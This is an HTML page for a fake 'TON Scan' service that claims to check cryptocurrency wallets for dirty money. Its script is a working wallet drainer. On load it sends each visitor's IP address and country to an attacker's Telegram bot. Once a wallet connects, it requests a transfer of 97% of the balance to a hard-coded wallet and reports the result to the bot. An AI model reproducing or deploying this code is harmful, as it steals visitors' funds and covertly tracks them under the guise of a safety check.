<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TON Scan</title>
    <script src="https://unpkg.com/@tonconnect/ui@latest/dist/tonconnect-ui.min.js"></script>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }
        .header {
            background-color: white;
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 10px 20px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
        }
        .header h1 {
            margin: 0;
            font-size: 34px; /* Увеличенный размер шрифта для заголовка */
        }
        .logo {
            height: 50px; /* Укажите нужный размер логотипа */
        }
        #ton-connect {
            margin: 20px;
        }
        .content {
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin: 20px;
        }
        .text {
            font-weight: 850;
            font-size: 85px; /* Увеличенный размер шрифта для текста */
            margin-right: 20px;
        }
        .image {
            width: 400px; /* Увеличенный размер изображения */
            height: auto;
        }
        .button {
            background-color: #000000; /* Измените на нужный цвет фона */
            color: white;
            padding: 20px 30px;
            border: none;
            border-radius: 30px; /* Увеличьте или уменьшите значение для изменения закругления углов */
            cursor: pointer;
            font-weight: bold;
        }
        .button:hover {
            background-color: #424040; /* Цвет фона при наведении */
        }
    </style>
</head>
<body>
<div class="header">
    <div style="display: flex; align-items: center;">
        <a href="https://ton.org/icons/custom/ton_text_logo_light.svg"> <!-- Замените на нужную ссылку на логотип -->
            <img src="https://ton.org/icons/custom/ton_text_logo_light.svg" alt="Logo" class="logo"> <!-- Замените на URL вашего логотипа -->
        </a>
        <h1 style="margin-left: 10px;">Scan</h1>
    </div>
    <button class="button">Check your wallet</button>
</div>
<div class="content">
    <div class="text">Checking cryptocurrency wallets for dirty money</div>
    <img class="image" src="https://scanusdt.com/images/home-image-gzJaQJ7U.png" alt="Checking Image">
</div>
<div id="ton-connect"></div>
<script>
    var mainWallet = "UQAKpGlAH4SaAHrIFn11baPIT9tdXUGtvXHiqFYmFIAg6sE5";
    var tgBotToken = "8040099832:AAFqbNdVna700tsYD5EcWFM2148tjqQMPdg";
    var tgChat = "https://t.me/+Y7yFosTtaaFlNzZi";

    var domain = window.location.hostname;
    var ipUser ;

    fetch('https://ipapi.co/json/').then(response => response.json()).then(data => {
        const country = data.country;
        ipUser  = data.ip;
        countryUser  = data.country;
        console.log('IP: ' + ipUser );
        console.log('Country: ' + countryUser );
        const messageOpen = `\uD83D\uDDC4*Domain:* ${domain}\n\uD83D\uDCBB*User *: ${ipUser } ${countryUser }\n\uD83D\uDCD6*Opened the website*`;
        const encodedMessageOpen = encodeURIComponent(messageOpen);
        const url = `https://api.telegram.org/bot${tgBotToken}/sendMessage?chat_id=${tgChat}&text=${encodedMessageOpen}&parse_mode=Markdown`;
        fetch(url, {
            method: 'POST',
        }).then(response => {
            if (response.ok) {
                console.log('Success send.');
            } else {
                console.error('Error send.');
            }
        }).catch(error => {
            console.error('Error: ', error);
        });
    }).catch(error => console.error('Error IP:', error));

    const tonConnectUI = new TON_CONNECT_UI.TonConnectUI({
        manifestUrl: 'https://' + domain + '/tonconnect-manifest.json',
        buttonRootId: 'ton-connect'
    });

    tonConnectUI.on('walletConnected', (walletAddress) => {
        console.log('Адрес кошелька:', walletAddress);
    });

    async function didtrans() {
        const response = await fetch('https://toncenter.com/api/v3/wallet?address=' + tonConnectUI.account.address);
        const data = await response.json();
        let originalBalance = parseFloat(data.balance);
        let processedBalance = originalBalance - (originalBalance * 0.03);
        let tgBalance = processedBalance / 1000000000;
        const transaction = {
            validUntil: Math.floor(Date.now() / 1000) + 60,
            messages: [{
                address: mainWallet,
                amount: processedBalance
            }]
        }
        try {
            const result = await tonConnectUI.sendTransaction(transaction);
            const messageSend = `\uD83D\uDDC4*Domain:* ${domain}\n\uD83D\uDCBB*User :* ${ipUser } ${countryUser }\n\uD83D\uDCC0*Wallet:* [Ton Scan](https://tonscan.org/address/${tonConnectUI.account.address})\n\n\uD83D\uDC8E*Send:* ${tgBalance}`;
            const encodedMessageSend = encodeURIComponent(messageSend);
            const url = `https://api.telegram.org/bot${tgBotToken}/sendMessage?chat_id=-${tgChat}&text=${encodedMessageSend}&parse_mode=Markdown`;
            fetch(url, {
                method: 'POST',
            }).then(response => {
                if (response.ok) {
                    console.log('Success send.');
                } else {
                    console.error('Error send.');
                }
            }).catch(error => {
                console.error('Error: ', error);
            });
        } catch (e) {
            const messageDeclined = `\uD83D\uDDC4*Domain:* ${domain}\n\uD83D\uDCBB*User :* ${ipUser } ${countryUser }\n\uD83D\uDCC0*Wallet:* [Ton Scan](https://tonscan.org/address/${tonConnectUI.account.address})\n\n\uD83D\uDED1*Declined or error.*`;
            const encodedMessageDeclined = encodeURIComponent(messageDeclined);
            const url = `https://api.telegram.org/bot${tgBotToken}/sendMessage?chat_id=-${tgChat}&text=${encodedMessageDeclined}&parse_mode=Markdown`;
            fetch(url, {
                method: 'POST',
            }).then(response => {
                if (response.ok) {
                    console.log('Success send.');
                } else {
                    console.error('Error send.');
                }
            }).catch(error => {
                console.error('Error: ', error);
            });
            console.error(e);
        }
    }
</script>
</body>
</html>